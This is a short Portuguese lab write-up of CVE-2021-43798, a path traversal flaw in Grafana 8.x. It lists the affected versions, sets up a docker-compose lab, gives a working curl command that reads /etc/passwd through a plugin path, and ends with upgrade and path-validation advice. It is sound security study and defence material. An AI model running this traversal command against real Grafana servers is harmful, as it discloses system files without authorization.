CVE-2021-43798
1. Resumo
- Grafana é uma plataforma de código aberto que suporta monitoramento e gerenciamento de dados. Nas versões abaixo, existe uma vulnerabilidade de Path Traversal que permite manipular caminhos de arquivos usando caracteres especiais como
../.
- 8.0.0 ou superior, inferior a 8.0.7
- 8.1.0 ou superior, inferior a 8.1.8
- 8.2.0 ou superior, inferior a 8.2.7
- 8.3.0
- O caminho vulnerável é
<grafana_host_url>/public/plugins/<plugin_id>/, onde <plugin_id> é o ID do plugin instalado. É possível verificar o caminho vulnerável através do material abaixo.
2. Configuração e execução do ambiente vulnerável
2.1 Ambiente utilizado
2.2 Método de execução
docker-compose up -d
3. Reprodução da vulnerabilidade
- Verificação da tela aberta
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Foi possível acessar o arquivo /etc/passwd através do comando acima.
4. Conclusão (Medidas de mitigação)
- Se você estiver usando uma versão afetada pela vulnerabilidade, deve atualizar para as versões corrigidas 8.3.1, 8.2.7, 8.1.8 ou 8.0.7.
- Para prevenir a vulnerabilidade de Path Traversal, aplique uma lista de permissões (whitelist) que permita acesso apenas a caminhos autorizados, e realize validação da entrada do usuário e normalização de caminhos para restringir acessos anormais como navegação para diretórios superiores (
../).
Referências